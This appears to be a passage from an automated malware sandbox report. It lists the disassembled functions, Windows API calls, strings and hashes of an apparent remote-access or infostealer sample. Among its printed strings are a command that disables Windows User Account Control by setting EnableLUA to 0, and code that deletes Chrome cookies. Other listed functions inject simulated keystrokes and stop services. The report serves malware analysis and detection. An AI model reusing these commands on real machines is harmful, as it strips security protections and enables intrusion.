                          • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                          • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                          Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • _memcmp.LIBVCRUNTIME ref: 00442935
                          • _free.LIBCMT ref: 004429A6
                          • _free.LIBCMT ref: 004429BF
                          • _free.LIBCMT ref: 004429F1
                          • _free.LIBCMT ref: 004429FA
                          • _free.LIBCMT ref: 00442A06
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                          • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                          • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                          • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                          Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: tcp$udp
                          • API String ID: 0-3725065008
                          • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                          • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                          • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                          • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                          Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                            • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                            • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                          • String ID: .part
                          • API String ID: 1303771098-3499674018
                          • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                          • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                          • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                          • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                          Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: InputSend
                          • String ID:
                          • API String ID: 3431551938-0
                          • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                          • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                          • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                          • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                          Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                          • __fassign.LIBCMT ref: 00447814
                          • __fassign.LIBCMT ref: 0044782F
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                          • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                          • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                          • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                          • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                          • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                          Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                          • _free.LIBCMT ref: 0044E128
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 0044E133
                          • _free.LIBCMT ref: 0044E13E
                          • _free.LIBCMT ref: 0044E192
                          • _free.LIBCMT ref: 0044E19D
                          • _free.LIBCMT ref: 0044E1A8
                          • _free.LIBCMT ref: 0044E1B3
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                          • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                          • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                          • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                          Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                          • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCurrentOpenProcessQueryValue
                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          • API String ID: 1866151309-2070987746
                          • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                          • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                          • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                          • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                          Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                          • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                          • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                          • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                          • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                          Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                          • GetLastError.KERNEL32 ref: 0040AA28
                          Strings
                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                          • UserProfile, xrefs: 0040A9EE
                          • [Chrome Cookies not found], xrefs: 0040AA42
                          • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          • API String ID: 2018770650-304995407
                          • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                          • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                          • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                          • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                          Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          • __allrem.LIBCMT ref: 00438A09
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                          • __allrem.LIBCMT ref: 00438A3C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                          • __allrem.LIBCMT ref: 00438A71
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                          • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                          • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                          • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                          Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea$__alloca_probe_16_free
                          • String ID: a/p$am/pm
                          • API String ID: 2936374016-3206640213
                          • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                          • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                          • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                          • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                          Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                          • int.LIBCPMT ref: 0040F8D7
                            • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                            • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                          • std::_Facet_Register.LIBCPMT ref: 0040F917
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                          • __Init_thread_footer.LIBCMT ref: 0040F97F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                          • String ID:
                          • API String ID: 3815856325-0
                          • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                          • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                          • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                          • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                          Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • _free.LIBCMT ref: 0044575C
                          • _free.LIBCMT ref: 00445784
                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • _abort.LIBCMT ref: 004457A3
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                          • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                          • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                          • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                          Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ControlManager
                          • String ID:
                          • API String ID: 221034970-0
                          • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                          • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                          • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                          • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                          Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                          • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                          • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSizeSleep
                          • String ID: h G
                          • API String ID: 1958988193-3300504347
                          • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                          • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                          • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                          • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                          Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegisterClassExA.USER32(00000030), ref: 0041B310
                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                          • GetLastError.KERNEL32 ref: 0041B335
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ClassCreateErrorLastRegisterWindow
                          • String ID: 0$MsgWindowClass
                          • API String ID: 2877667751-2410386613
                          • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                          • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                          • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                          • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                          Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                            • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                          • _UnwindNestedFrames.LIBCMT ref: 00437631
                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                          • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                          • String ID: /zC
                          • API String ID: 2633735394-4132788633
                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                          Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                          • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                          • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                          • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: MetricsSystem
                          • String ID: ]tA
                          • API String ID: 4116985748-3517819141
                          • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                          • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                          • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                          • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                          Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                          Strings
                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                          • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                          • API String ID: 2922976086-4183131282
                          • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                          • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                          • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                          • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                          Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                          • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
